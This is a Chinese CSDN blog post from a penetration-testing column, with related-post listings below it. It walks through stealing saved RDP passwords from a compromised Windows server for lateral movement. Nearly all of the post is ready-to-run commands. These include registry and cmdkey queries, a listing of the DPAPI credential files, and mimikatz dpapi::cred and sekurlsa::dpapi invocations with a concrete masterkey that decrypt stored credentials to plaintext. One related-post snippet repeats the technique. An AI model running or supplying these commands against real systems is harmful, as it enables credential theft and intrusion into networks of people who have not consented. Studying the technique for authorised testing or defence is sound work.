RDP远程桌面密码凭证获取

最新推荐文章于 2024-05-15 18:18:40 发布
最新推荐文章于 2024-05-15 18:18:40 发布
阅读量5.4k 收藏 8
点赞数 1
分类专栏: 内网渗透 文章标签: Windows RDP 远程桌面 密码凭证 mimikatz
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43571641/article/details/127403110
版权

前言

在渗透过程中获取到一台Windows服务器后,可以尝试获取当前机器保存的RDP远程桌面密码凭证,进而在内网横向渗透中进一步扩大战果。

0x01 密码凭证获取

查看当前主机本地连接过的目标机器记录

reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /s

查看当前主机保存的RDP凭据

cmdkey /list

查看本地用户是否存有RDP密码文件

dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*

选择密码文件,使用mimikatz对其文件进行解密,并记录下guidMasterKey的值

mimikatz.exe "privilege::debug" "dpapi::cred /in:C:\Users\administrator.LUCKYSEC\AppData\Local\Microsoft\Credentials\5490905D7B7F0E87893DE8FCE6CC1710" exit

根据guidMasterKey,使用mimikatz找到对应的Masterkey

mimikatz.exe "privilege::debug" "sekurlsa::dpapi" exit > dpapi.txt

通过Masterkey,使用mimikatz解密pbData数据,获取RDP连接明文密码

mimikatz.exe "privilege::debug" "dpapi::cred /in:C:\Users\administrator.LUCKYSEC\AppData\Local\Microsoft\Credentials\5490905D7B7F0E87893DE8FCE6CC1710 /masterkey:c7c73d9e7a83ed8991e7a0de7942a5ab6c8924ff71c33ef8370a5294f677042787f311c534977476cbe6514ae2ba77d11172fbd5b6a51ff188f87d720b44fee1" exit

参考文章

  • https://mp.weixin.qq.com/s/4nlyOIuyQZ9h0Bb5jQO4wQ
Luckysec
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
windows10 获取之前连接密码的方式
weixin_56636166的博客
08-11 4137
windows10 获取之前连接密码的方式
查看远程桌面保存的密码_四大密码查看器 星号、浏览器保存密码、连接过的WIFI账号密码...
weixin_39622138的博客
12-13 8295
联系我们微信:vae1314lmb 想加微信交流群请添加作者微信备注拉群原创:winnie2007Windows四大密码查看器1.星号密码查看器有些软件会设置密码保护,对于已设置自动登录但是忘记密码可以轻松查看2.浏览器保存密码查看器浏览器在输入密码时都会提示保存密码,时间长了就密密麻麻的一大堆,利用浏览器保存密码查看器可以查看所有浏览器保存的账号和密码。3.连接过的WIFI账号...
远程桌面连接工具(可保存多个连接和密码)
09-16
将2003的远程控制tsmmc转移到XP系统中 tsmmc是Win20003下一个用于远程桌面连接的通讯工具,它相比WinXP上mstsc.exe来说更方便使用,特别是管理多个远程服务器。由于WinXP上没有这个软件,所以我特从Win2003上剥离到WinXP上来运行。 使用方法: 1、将tsmmc目录下的mstsmhst.dll、mstsmmc.dll、mstscax.dll、MSTSWEB.CAT tsmmc.msc拷贝到C:\WINDOWS\system32目录下; 2、在开始菜单的运行栏注册dll文件(或运行run.bat): regsvr32 MSTSMMC.DLL /s regsvr32 MSTSCAX.DLL /s regsvr32 MSTSMHST.DLL /s 3、运行tsmmc.msc 注意:win7系统必须放在系统目录下
Windows远程桌面(RDP)密码凭证获取 (゚益゚メ) 渗透测试
寻觅的博客
03-07 5565
文章目录RDP连接记录MySQL数据库密码破解WiFi密码获取浏览器相关记录其他可造成安全隐患软件NacicatXmangagerTeamview RDP连接记录 MySQL数据库密码破解 WiFi密码获取 浏览器相关记录 其他可造成安全隐患软件 Nacicat Xmangager Teamview ...
RDP密码凭据抓取
最新发布
Y22Lee的博客
05-15 529
命令:dpapi::cred /in:凭据文件路径 /masterkey:masterkey值。
[内网]RDP远程桌面密码凭证获取
Keepb1ue的博客
05-15 1万+
通过密码文件获取guidMasterKey的值,根据guidMasterKey找到对应Masterkey通过Masterkey进行解密,获取明文。
获取windows10远程桌面记录的用户名密码
阿拉丁的知识分享库
06-06 5306
Windows 密码恢复工具双击netpass.exe,点击File,点击Advanced Options,按照如下图选择
远程桌面密码查看器
09-08
远程桌面密码查看器
使用电脑上自带的软件进行远程连接
xzy的博客
11-10 1951
用户名和密码怎么查看呢?
远程桌面登录工具-可保存密码,下次直接调用
02-27
1、windows自己的登录工具不能保存密码,有自己的缺陷 2、这个登录工具可以输入密码,另存为别的名字,下次登录调用时就不需要输入密码了,非常方便
远程桌面控制.rar
06-12
3. **远程桌面协议(RDP)**:虽然没有明确指出,但大多数远程桌面控制工具都是基于微软的远程桌面协议,这是一种广泛使用的标准,能提供图形化的用户界面,并支持音频、打印、剪贴板等功能。 4. **安全性**:在...
Delphi批理远程桌面管理.rar
07-14
开发者需要设置目标计算机的IP地址、用户名、密码和端口号,然后建立连接,进而实现远程桌面的显示和控制。 其次,批量管理的关键在于如何遍历和识别多台计算机。这通常涉及到网络扫描技术,如使用SNMP协议查询网络...
远程桌面连接器
09-16
远程桌面连接器是一种软件工具,通常用于通过网络访问并控制远程计算机。...总之,C#为开发远程桌面连接器提供了强大而灵活的工具,结合对RDP协议的理解和适当的库支持,可以构建出高效且功能丰富的远程桌面应用。
vc图形界面的windows远程连接程序
04-13
远程连接的核心是微软的RDP(Remote Desktop Protocol),这是一个允许用户通过网络对远程计算机进行桌面级别的操作的协议。要实现RDP连接,我们需要使用Win32 API中的`WTS*`系列函数,如`WTSEnumerateSessions`用于...
删除远程连接记录.rar
09-23
3. **Default.rdp文件**:这是一种远程桌面协议文件,通常位于用户的个人文件夹中(如`%USERPROFILE%\AppData\Roaming\Microsoft\Terminal Server Client`)。Default.rdp存储了用户的远程桌面连接设置,包括服务器...
获取远程桌面密码(mimikatz)
huyaguang的专栏
09-27 1287
获取远程桌面密码(mimikatz)
密码抓取--获取已控机器本地保存的RDP密码
热门推荐
网络安全。
02-24 1万+
0x01 简介 在获取内网机器管理员权限后,查看是否有保存到本地的RDP连接密码,对保存到本地的RDP连接密码进行解密,解密成功后可使用此凭据继续横向移动。 0x02 获取已控机器本地保存的RDP密码 一、mimikatz 1、查看本地机器本地连接过的目标机器。 reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Clie...
rdp远程桌面连接安装
06-07
RDP远程桌面连接不需要单独安装,因为它是Windows操作系统自带的远程连接工具。但是,如果你的Windows版本不支持RDP远程桌面连接,或者你想使用更高级的远程连接功能,你可以考虑安装第三方远程连接软件。 以安装第三方远程连接软件TeamViewer为例,具体步骤如下: 1. 访问TeamViewer官网:在浏览器中打开TeamViewer官网(https://www.teamviewer.com/)。 2. 下载TeamViewer安装程序:在官网首页中,点击“下载”按钮,在弹出的下载页面中选择适合你的操作系统版本,然后下载TeamViewer安装程序。 3. 运行安装程序:下载完成后,双击安装程序打开,然后按照提示进行安装。 4. 启动TeamViewer:安装完成后,可以在Windows的“开始”菜单中找到TeamViewer的快捷方式,点击打开。 5. 输入远程计算机的ID和密码:在TeamViewer的主界面中,输入要连接的远程计算机的ID和密码,然后点击“连接”按钮。 6. 等待连接成功:连接成功后,就可以在本地计算机上控制远程计算机了。 希望这些步骤能够帮助你成功安装和使用远程连接软件!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Luckysec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值